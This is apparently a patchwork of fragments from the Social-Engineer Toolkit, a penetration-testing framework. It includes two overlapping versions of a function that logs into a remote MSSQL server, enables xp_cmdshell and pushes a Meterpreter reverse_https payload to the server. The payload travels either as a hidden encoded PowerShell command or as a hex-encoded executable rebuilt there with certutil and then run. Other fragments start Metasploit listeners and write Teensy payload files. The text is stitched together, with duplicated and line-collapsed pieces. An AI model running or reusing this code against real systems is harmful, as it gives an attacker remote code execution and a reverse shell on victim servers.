domain = "WORKGROUP" # set the threads if threads == "": threads = "15" payload = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower() # # payload generation for powershell injection # try: # specify ipaddress of reverse listener ipaddr = core.grab_ipaddress() core.update_options("IPADDR=" + ipaddr) port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if port == "": port = "443" core.update_options("PORT={0}".format(port)) with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("{0} {1},".format(payload, port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep
# Python3 renamed raw_input to input try: input = raw_input except NameError: pass core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5) show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu) powershell_menu_choice = input(core.setprompt(["29"], "")) if powershell_menu_choice != "99": # specify ipaddress of reverse listener #ipaddr = core.grab_ipaddress() ipaddr = raw_input("Enter the IPAddress or DNS name for the reverse host: ") core.update_options("IPADDR=" + ipaddr) # if we select alphanumeric shellcode if powershell_menu_choice == "1": port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if not port: port = "443" core.update_options("PORT=" + port) core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") with open(core.setdir + "/payload_options.shellcode", "w") as filewrite: filewrite.write("windows/meterpreter/reverse_https {},".format(port)) try: core.module_reload(src.payloads.powershell.prep)
# Py2/3 compatibility # Python3 renamed raw_input to input try: input = raw_input except NameError: pass # see if we are tracking emails track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower() # grab the randomized applet name applet_name = core.check_options("APPLET_NAME=") if applet_name == "": applet_name = core.generate_random_string(6, 15) + ".jar" core.update_options("APPLET_NAME=" + applet_name) # define if we are using a custom payload custom = 0 if core.check_options("CUSTOM_EXE="): custom = 1 core.print_status("Note that since you are using a custom payload, you will need to create your OWN listener.") core.print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.") core.print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.") # here we need to modify the java applet to recognize custom attribute with open(os.path.join(core.setdir, "web_clone/index.html")) as fileopen: data = fileopen.read() with open(os.path.join(core.setdir, "web_clone/index.html.new"), "w") as filewrite:
""") print("[*] Payload has been extracted. Copying file to {0}".format( os.path.join(core.setdir + "reports/teensy.pde"))) if not os.path.isdir(os.path.join(core.setdir + "reports")): os.makedirs(os.path.join(core.setdir + "reports")) with open(os.path.join(core.setdir + "/reports/teensy.pde", "w")) as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input(core.setprompt(["6"], "IP address to connect back on")) core.update_options("IPADDR=" + ipaddr) if core.check_options("PORT=") != 0: port = core.check_options("PORT=") else: port = input("Enter the port to connect back on: ") with open(os.path.join(core.setdir + "/metasploit.answers", "w")) as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set AutoRunScript post/windows/manage/smart_migrate\n" "exploit -j".format(payload, ipaddr, port))
""" % (core.powershell_encodedcommand()) print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.ino"))) if not os.path.isdir(os.path.join(core.setdir + "reports")): os.makedirs(os.path.join(core.setdir + "reports")) with open(os.path.join(core.setdir + "reports/teensy.ino"), "w") as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("LHOST IP address to connect back on: ") core.update_options("IPADDR=" + ipaddr) if core.check_options("PORT=") != 0: port = core.check_options("PORT=") else: port = input("Enter the port to connect back on: ") with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set AutoRunScript post/windows/manage/smart_migrate\n" "exploit -j".format(payload, ipaddr, port)) print("[*] Launching Metasploit....") try:
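def _enable_xp_cmdshell(conn):
    """Enable the xp_cmdshell stored procedure on the connected server.

    This is a persistent, server-wide configuration change on the target
    (sp_configure + RECONFIGURE); operators should revert it during cleanup.
    Failures are reported rather than raised so the caller can still attempt
    the deployment (e.g. when xp_cmdshell was already enabled another way).
    """
    core.print_status("Enabling the xp_cmdshell stored procedure...")
    try:
        conn.execute_query(
            "exec master.dbo.sp_configure 'show advanced options',1;"
            "GO;"
            "RECONFIGURE;"
            "GO;"
            "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
            "GO;"
            "RECONFIGURE;"
            "GO")
    except Exception as err:
        # this used to be swallowed silently; every later step depends on it
        core.print_error("Could not enable xp_cmdshell, continuing anyway: {0}".format(err))


def _choose_deployment_method():
    """Prompt the operator for the delivery method.

    Returns "1" for PowerShell injection, "2" for the certutil hex-to-binary
    conversion, or None when reading the answer raised (the error is printed).
    """
    option = None
    try:
        print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")
        choice = input("Enter your choice:\n\n"
                       "1.) Use PowerShell Injection (recommended)\n"
                       "2.) Use Certutil binary conversion\n\n"
                       "Enter your choice [1]:")
        if choice == "":
            choice = "1"
        if choice == "1":
            core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
            option_ps = input("Do you want to use powershell injection? [yes/no]:")
            # compare case-insensitively: "Y"/"YES" used to fall through to certutil
            if option_ps.lower() in ("", "y", "yes"):
                option = "1"
                core.print_status("Powershell delivery selected. Boom!")
            else:
                option = "2"
        else:
            # fall back to the older certutil ("debug") conversion method
            core.print_status("Powershell not selected, using debug method.")
            option = "2"
    except Exception as err:
        print(err)
    return option


def _prompt_own_payload():
    """Ask (up to three times) for a local executable to deploy.

    Returns the validated path, or None if no existing file was given, in
    which case the caller falls back to the Metasploit payload.
    """
    for _ in range(3):
        candidate = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
        if os.path.isfile(candidate):
            return candidate
        core.print_error("File not found! Try again.")
    core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
    return None


def _stage_msf_payload():
    """Generate the Metasploit payload and return the path of the file to deploy.

    With a SET interactive-shell payload (``set.payload`` marker present) the
    executable is expected under ``web_clone``; otherwise (posix only)
    ``msf.exe`` is saved as ``1msf.exe`` and ``msf2.exe`` takes its place.
    """
    prep_powershell_payload()
    web_path = None
    if os.path.isfile(os.path.join(core.setdir + "set.payload")):
        web_path = os.path.join(core.setdir + "web_clone")
    elif operating_system == "posix":
        web_path = core.setdir
        if not os.path.isfile(core.setdir + "1msf.exe"):
            # plain file copies instead of "cp ..." through a shell: core.setdir
            # was interpolated into the command line, so a path containing
            # whitespace or shell metacharacters would break or be interpreted.
            # (The old "cp 1msf.exe <setdir>/" copied a file onto itself and
            # did nothing, so it is dropped.)
            for src_name, dst_name in (("msf.exe", "1msf.exe"), ("msf2.exe", "msf.exe")):
                try:
                    shutil.copyfile(os.path.join(core.setdir, src_name),
                                    os.path.join(core.setdir, dst_name))
                except (IOError, OSError) as err:
                    # the shell version only printed cp's error and went on
                    core.print_error("Could not copy {0} to {1}: {2}".format(src_name, dst_name, err))
    # NOTE(review): on a non-posix host without set.payload web_path stays
    # None and the join below raises TypeError, exactly as before
    return os.path.join(web_path + "1msf.exe")


def _write_hex_copy(payload_filename):
    """Hex-encode payload_filename into <setdir>payload.hex (text file)."""
    with open(payload_filename, "rb") as fileopen:
        data = fileopen.read()
    # hexlify() returns bytes on Python 3; decode so it can be written in text mode
    hexdata = binascii.hexlify(data).decode("ascii")
    with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
        filewrite.write(hexdata)


def _prepare_powershell_stage():
    """Build the PowerShell one-liner and the matching multi/handler rc file.

    Prompts for the callback port, records IPADDR/PORT/POWERSHELL_SOLO in the
    SET options, runs ``src.payloads.powershell.prep`` (which produces
    ``<setdir>x86.powershell``) and exports the command plus ``powershell.rc``
    under ``<setdir>reports/powershell``.

    Returns the full ``powershell ... -EncodedCommand <base64>`` command line.
    """
    core.print_status("Using universal powershell x86 process downgrade attack..")
    # callback (listener) address - not the MSSQL target address
    ipaddr = core.grab_ipaddress()
    core.update_options("IPADDR=" + ipaddr)
    port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
    if not port:
        port = "443"
    core.update_options("PORT={0}".format(port))
    core.update_options("POWERSHELL_SOLO=ON")
    core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
    with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
        # format needed for shellcode generation: "<payload> <port>,"
        filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
    try:
        core.module_reload(src.payloads.powershell.prep)
    except Exception:
        import src.payloads.powershell.prep

    report_dir = os.path.join(core.setdir + "reports/powershell")
    if not os.path.isdir(report_dir):
        os.makedirs(report_dir)
    with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
        encoded = fileopen.read()
    powershell_command = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(encoded)
    core.print_status("If you want the powershell commands and attack, "
                      "they are exported to {0}".format(report_dir))
    with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
        filewrite.write(powershell_command)
    # LHOST 0.0.0.0 makes the handler listen on every local interface
    with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
        filewrite.write("use multi/handler\n"
                        "set payload windows/meterpreter/reverse_https\n"
                        "set lport {0}\n"
                        "set LHOST 0.0.0.0\n"
                        "exploit -j".format(port))
    return powershell_command


def _upload_hex_via_certutil(conn, random_exe):
    """Echo <setdir>payload.hex to <random_exe>.crt on the target, convert and run it.

    Each xp_cmdshell call appends up to 900 hex characters. The .crt and .exe
    land in the working directory of the SQL Server service process and are
    not removed afterwards - note them for cleanup.
    """
    core.print_status("Sending the main payload via to be converted back to a binary.")
    core.print_status("Dropping initial begin certificate header...")
    conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
    # read 900 characters at a time; the handle is closed when the loop ends
    with open(core.setdir + 'payload.hex', "r") as fileopen:
        while True:
            data = fileopen.read(900).rstrip()
            if data == "":
                break
            core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD, data=data, endc=core.bcolors.ENDC))
            conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data, exe=random_exe))
    core.print_status("Delivery complete. Converting hex back to binary format.")
    core.print_status("Dropping end header for binary format conversion...")
    conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
    # NOTE(review): certutil -decode is a base64 decoder while payload.hex holds
    # hexlify() output; confirm on a real target that the produced .exe is valid
    # (certutil -decodehex may be the intended switch)
    core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
    conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
    core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
                      "You know. When you celebrate. Salute to you ninja - you deserve it.")
    conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))


def _run_detached(conn, sql_command):
    """Execute sql_command on a throwaway thread.

    xp_cmdshell does not return until the spawned process exits, so a
    synchronous execute_query would hang once the payload is running.
    """
    try:
        import thread
    except ImportError:
        import _thread as thread  # Python 3 name of the module
    thread.start_new_thread(conn.execute_query, (sql_command,))


def deploy_hex2binary(ipaddr, port, username, password):
    """Deploy and execute a payload on a remote MSSQL host through xp_cmdshell.

    Connects to ``ipaddr:port`` with the supplied SQL credentials, enables the
    ``xp_cmdshell`` stored procedure and prompts for one of two delivery
    methods:

    * "1" PowerShell: a base64-encoded one-liner is generated, a matching
      ``multi/handler`` rc file is written and msfconsole is started (posix)
      before the command is fired through xp_cmdshell.
    * "2" certutil: a Metasploit-generated (or operator-supplied) executable
      is hex-encoded locally, echoed onto the target in chunks, converted with
      certutil and executed.

    Args:
        ipaddr: MSSQL target address (the callback address is prompted for
            separately on the PowerShell path).
        port: MSSQL target TCP port.
        username: SQL login used for the connection.
        password: Password for ``username``.

    Side effects on the target: xp_cmdshell stays enabled and, on the certutil
    path, ``<random>.crt``/``<random>.exe`` remain on disk. Locally it writes
    under ``core.setdir`` and may spawn msfconsole, an HTTP server and the SET
    listener. Exceptions from ``_mssql.connect`` propagate to the caller.
    """
    child2 = None            # pexpect handle of msfconsole when it is started
    choice1 = "1"            # "1" Metasploit payload, "2" operator-supplied file
    powershell_command = None

    conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
    _enable_xp_cmdshell(conn)
    option = _choose_deployment_method()

    payload_filename = None
    if option == "2":
        core.print_status("You can either select to use a default "
                          "Metasploit payload here or import your "
                          "own in order to deliver to the system. "
                          "Note that if you select your own, you "
                          "will need to create your own listener "
                          "at the end in order to capture this.\n\n")
        choice1 = input("1.) Use Metasploit (default)\n"
                        "2.) Select your own\n\n"
                        "Enter your choice[1]:")
        if choice1 == "":
            choice1 = "1"
        if choice1 == "2":
            payload_filename = _prompt_own_payload()
            if payload_filename is None:
                choice1 = "1"
        if choice1 == "1":
            payload_filename = _stage_msf_payload()
        _write_hex_copy(payload_filename)

        # Metasploit payload without the SET interactive shell: start the
        # handler now from meta_config so it is up before the payload runs
        if choice1 == "1" and not os.path.isfile(os.path.join(core.setdir + "set.payload")) \
                and operating_system == "posix":
            try:
                core.module_reload(pexpect)
            except Exception:
                import pexpect
            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(
                os.path.join(core.meta_path() + "msfconsole"),
                os.path.join(core.setdir + "meta_config")))

    # random executable name used for the dropped .crt/.exe
    random_exe = core.generate_random_string(10, 15)

    if option == "1":
        powershell_command = _prepare_powershell_stage()
        # grab the metasploit path from config or smart detection
        msf_path = core.meta_path()
        if operating_system == "posix":
            try:
                core.module_reload(pexpect)
            except Exception:
                import pexpect
            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}".format(
                os.path.join(msf_path + "msfconsole"),
                os.path.join(core.setdir + "reports/powershell/powershell.rc")))
            core.print_status("Waiting for the listener to start first before we continue forward...")
            core.print_status("Be patient, Metasploit takes a little bit to start...")
            child2.expect("Starting the payload handler", timeout=30000)
            core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
            time.sleep(5)
        # kept for parity with the original flow; random_exe is unused on this path
        random_exe = powershell_command

    if option == "2":
        _upload_hex_via_certutil(conn, random_exe)

    # SET interactive-shell payload: also serve the stage over HTTP
    if choice1 == "1" and os.path.isfile(os.path.join(core.setdir + "set.payload")):
        core.print_status("Spawning separate child process for listener...")
        try:
            shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
        except Exception:
            pass  # optional stage file; best effort as before
        # start a threaded webserver in the background (fixed argv, no shell needed)
        subprocess.Popen(["python", "src/html/fasttrack_http_server.py"])

    # fire the payload; detached because xp_cmdshell blocks while it runs
    if option == "1":
        core.print_status("Triggering the powershell injection payload... ")
        _run_detached(conn, "exec master..xp_cmdshell '{0}'".format(powershell_command))
    if option == "2":
        core.print_status("Triggering payload stager...")
        alphainject = ""
        if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
            with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
                alphainject = fileopen.read()
        _run_detached(conn, "xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))

    time.sleep(1)
    if choice1 == "1" and os.path.isfile(os.path.join(core.setdir + "set.payload")):
        os.system("python ../../payloads/set_payloads/listener.py")
    # hand the msfconsole session to the operator; nothing to do when no
    # listener was spawned (non-posix, or SET interactive shell payload)
    if child2 is not None:
        try:
            child2.interact()
            try:
                os.remove("x")
            except OSError:
                pass
        except Exception:
            pass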
def deploy_hex2binary(ipaddr, port, username, password):
    """Deploy and execute a payload on a remote MSSQL host through xp_cmdshell.

    Connects to ``ipaddr:port`` with the supplied SQL credentials, enables the
    ``xp_cmdshell`` stored procedure and prompts for one of two delivery
    methods: "1" PowerShell (encoded one-liner, multi/handler started with
    pexpect on posix) or "2" certutil (a local executable is hex-encoded,
    echoed onto the target in 900-character chunks, converted with certutil
    and executed).

    Args:
        ipaddr: MSSQL target address (the PowerShell path prompts separately
            for the callback address).
        port: MSSQL target TCP port.
        username: SQL login used for the connection.
        password: Password for ``username``.

    Side effects on the target: xp_cmdshell stays enabled and, on the certutil
    path, ``<random>.crt``/``<random>.exe`` are left on disk. Locally it
    writes under ``core.setdir`` and may spawn msfconsole, an HTTP server and
    the SET listener. Exceptions from ``_mssql.connect`` propagate.

    NOTE(review): this copy uses the Python 2 only ``file()`` builtin and
    ``thread`` module and writes ``binascii.hexlify()`` output (bytes on
    Python 3) to a text-mode file; it will not run unmodified on Python 3.
    """
    # base variable used to select payload option
    option = None
    choice1 = "1"
    conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
    core.print_status("Enabling the xp_cmdshell stored procedure...")
    # persistent, server-wide configuration change on the target; failures are
    # ignored here, so a failing xp_cmdshell call later is the first symptom
    try:
        conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
                           "GO;"
                           "RECONFIGURE;"
                           "GO;"
                           "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
                           "GO;"
                           "RECONFIGURE;"
                           "GO")
    except:
        pass

    # just throw a simple command via powershell to get the output
    try:
        print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")
        choice = input("Enter your choice:\n\n"
                       "1.) Use PowerShell Injection (recommended)\n"
                       "2.) Use Certutil binary conversion\n\n"
                       "Enter your choice [1]:")
        if choice == "":
            choice = "1"
        if choice == "1":
            core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
            option_ps = input("Do you want to use powershell injection? [yes/no]:")
            # NOTE(review): only the empty answer is lower-cased; "Y"/"YES"
            # fall through to the certutil method
            if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
                option = "1"
                core.print_status("Powershell delivery selected. Boom!")
            else:
                option = "2"
        # otherwise, fall back to the older version using debug conversion via hex
        else:
            core.print_status("Powershell not selected, using debug method.")
            option = "2"
    except Exception as err:
        # option stays None; neither deployment branch below will run
        print(err)

    payload_filename = None
    # if we don't have powershell
    if option == "2":
        # give option to use msf or your own
        core.print_status("You can either select to use a default "
                          "Metasploit payload here or import your "
                          "own in order to deliver to the system. "
                          "Note that if you select your own, you "
                          "will need to create your own listener "
                          "at the end in order to capture this.\n\n")
        choice1 = input("1.) Use Metasploit (default)\n"
                        "2.) Select your own\n\n"
                        "Enter your choice[1]:")
        if choice1 == "":
            choice1 = "1"
        if choice1 == "2":
            # three attempts to name an existing file, then fall back to Metasploit
            attempts = 0
            while attempts <= 2:
                payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
                if os.path.isfile(payload_filename):
                    break
                else:
                    core.print_error("File not found! Try again.")
                    attempts += 1
            else:
                core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
                choice1 = "1"
        if choice1 == "1":
            web_path = None
            #prep_powershell_payload()
            import src.core.payloadgen.create_payloads
            # if we are using a SET interactive shell payload then we need to make
            # the path under web_clone versus ~./set
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                web_path = os.path.join(core.setdir + "web_clone")
            # then we are using metasploit
            else:
                if operating_system == "posix":
                    web_path = core.setdir
                    # if it isn't there yet
                    if not os.path.isfile(core.setdir + "1msf.exe"):
                        # move it then
                        # NOTE(review): core.setdir is interpolated into a shell
                        # command line; whitespace or shell metacharacters in the
                        # path break (or are interpreted by) these cp calls. The
                        # second cp copies 1msf.exe onto its own directory and is a no-op.
                        subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (core.setdir, core.setdir), shell=True).wait()
                        subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait()
                        subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait()
            # NOTE(review): web_path is still None on a non-posix host without
            # set.payload, so this join raises TypeError
            payload_filename = os.path.join(web_path + "1msf.exe")

        with open(payload_filename, "rb") as fileopen:
            # read in the binary
            data = fileopen.read()
            # convert the binary to hex
            # NOTE(review): returns bytes on Python 3; the text-mode write below then fails
            data = binascii.hexlify(data)
            # we write out binary out to a file
            with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
                filewrite.write(data)

        if choice1 == "1":
            # if we are using metasploit, start the listener
            if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
                if operating_system == "posix":
                    try:
                        core.module_reload(pexpect)
                    except:
                        import pexpect
                    core.print_status("Starting the Metasploit listener...")
                    msf_path = core.meta_path()
                    # handler config comes from <setdir>meta_config written elsewhere
                    child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), os.path.join(core.setdir + "meta_config")))

    # random executable name (used for the .crt/.exe dropped on the target)
    random_exe = core.generate_random_string(10, 15)

    #
    # next we deploy our hex to binary if we selected option 1 (powershell)
    #
    if option == "1":
        core.print_status("Using universal powershell x86 process downgrade attack..")
        payload = "x86"
        # specify ipaddress of reverse listener (callback address, not the MSSQL target)
        ipaddr = core.grab_ipaddress()
        core.update_options("IPADDR=" + ipaddr)
        port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
        if not port:
            port = "443"
        core.update_options("PORT={0}".format(port))
        core.update_options("POWERSHELL_SOLO=ON")
        core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
        #with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
        # format needed for shellcode generation
        # NOTE(review): file() is Python 2 only (NameError on Python 3)
        filewrite = file(core.setdir + "/payload_options.shellcode", "w")
        filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
        filewrite.close()
        # importing/reloading the prep module is what generates <setdir>x86.powershell
        try:
            core.module_reload(src.payloads.powershell.prep)
        except:
            import src.payloads.powershell.prep

        # launch powershell
        #prep_powershell_payload()
        # create the directory if it does not exist
        if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
            os.makedirs(os.path.join(core.setdir + "reports/powershell"))
        #with open(os.path.join(core.setdir + "x86.powershell")) as x86:
        # NOTE(review): file() is Python 2 only; the handle is never closed explicitly
        x86 = file(core.setdir + "x86.powershell").read().rstrip()
        # x86 = x86.read()
        x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
        core.print_status("If you want the powershell commands and attack, "
                          "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
        filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
        filewrite.write(x86)
        filewrite.close()

        # if our payload is x86 based - need to prep msfconsole rc
        # (payload is always "x86" here, so the else branch is unreachable)
        if payload == "x86":
            powershell_command = x86
            # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
            #with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
            # LHOST 0.0.0.0 makes the handler listen on every local interface
            filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w")
            filewrite.write("use multi/handler\n"
                            "set payload windows/meterpreter/reverse_https\n"
                            "set lport {0}\n"
                            "set LHOST 0.0.0.0\n"
                            "exploit -j".format(port))
            filewrite.close()
        else:
            powershell_command = None

        # grab the metasploit path from config or smart detection
        msf_path = core.meta_path()
        if operating_system == "posix":
            try:
                core.module_reload(pexpect)
            except:
                import pexpect
            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"), os.path.join(core.setdir + "reports/powershell/powershell.rc")))
            core.print_status("Waiting for the listener to start first before we continue forward...")
            core.print_status("Be patient, Metasploit takes a little bit to start...")
            #child2.expect("Starting the payload handler", timeout=30000)
            child2.expect("Processing", timeout=30000)
            core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
            time.sleep(5)

        # assign random_exe command to the powershell command
        random_exe = powershell_command

    #
    # next we deploy our hex to binary if we selected option 2 (debug)
    #
    if option == "2":
        # here we start the conversion and execute the payload
        core.print_status("Sending the main payload via to be converted back to a binary.")
        # read in the file 900 bytes at a time
        #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
        # NOTE(review): this handle is never closed
        fileopen = open(core.setdir + 'payload.hex', "r")
        core.print_status("Dropping initial begin certificate header...")
        # the .crt/.exe are created in the working directory of the SQL Server
        # service process and are not removed afterwards
        conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
        # a file object is always truthy; the loop only ends via the break below
        while fileopen:
            data = fileopen.read(900).rstrip()
            #for data in fileopen.read(900).rstrip():
            if data == "":
                break
            core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD, data=data, endc=core.bcolors.ENDC))
            conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data, exe=random_exe))
        core.print_status("Delivery complete. Converting hex back to binary format.")
        core.print_status("Dropping end header for binary format conversion...")
        conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
        # NOTE(review): certutil -decode is a base64 decoder while payload.hex holds
        # hexlify() output; confirm the produced .exe is valid on a real target
        core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
        conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
        core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
                          "You know. When you celebrate. Salute to you ninja - you deserve it.")
        conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))

    # if we are using SET payload
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.setdir + "set.payload")):
            core.print_status("Spawning separate child process for listener...")
            try:
                shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
            except:
                pass
            # start a threaded webserver in the background
            subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
            # grab the port options
            # if core.check_options("PORT=") != 0:
            #    port = core.heck_options("PORT=")
            # # if for some reason the port didnt get created we default to 443
            # else:
            #    port = "443"

    # thread is needed here due to the connect not always terminating thread,
    # it hangs if thread isnt specified
    # NOTE(review): the "thread" module is Python 2 only (it is "_thread" on Python 3)
    try:
        core.module_reload(thread)
    except:
        import thread

    # execute the payload
    # we append more commands if option 1 is used
    if option == "1":
        core.print_status("Triggering the powershell injection payload... ")
        sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
        thread.start_new_thread(conn.execute_query, (sql_command,))

    # using the old method
    if option == "2":
        core.print_status("Triggering payload stager...")
        alphainject = ""
        if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
            with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
                alphainject = fileopen.read()
        # the .exe was already run once above; this second run passes the alpha stage as argv
        sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
        # start thread of SQL command that executes payload
        thread.start_new_thread(conn.execute_query, (sql_command,))

    time.sleep(1)
    # if pexpect doesnt exit right then it freaks out
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.setdir + "set.payload")):
            os.system("python ../../payloads/set_payloads/listener.py")
    # child2 is unbound when no listener was spawned; the outer except absorbs that
    try:
        # interact with the child process through pexpect
        child2.interact()
        try:
            os.remove("x")
        except:
            pass
    except:
        pass
domain = "WORKGROUP" # set the threads if threads == "": threads = "15" payload = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower() # # payload generation for powershell injection # try: # specify ipaddress of reverse listener ipaddr = core.grab_ipaddress() core.update_options("IPADDR=" + ipaddr) port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if port == "": port = "443" core.update_options("PORT={0}".format(port)) with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("{0} {1},".format(payload, port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status( "Prepping the payload for delivery and injecting alphanumeric shellcode..." ) try:
} """) print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.pde"))) if not os.path.isdir(os.path.join(core.setdir + "reports")): os.makedirs(os.path.join(core.setdir + "reports")) with open(os.path.join(core.setdir + "reports/teensy.pde"), "w") as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ") if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("LHOST IP address to connect back on: ") core.update_options("IPADDR=" + ipaddr) if core.check_options("PORT=") != 0: port = core.check_options("PORT=") else: port = input("Enter the port to connect back on: ") with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set AutoRunScript post/windows/manage/smart_migrate\n" "exploit -j".format(payload, ipaddr, port))
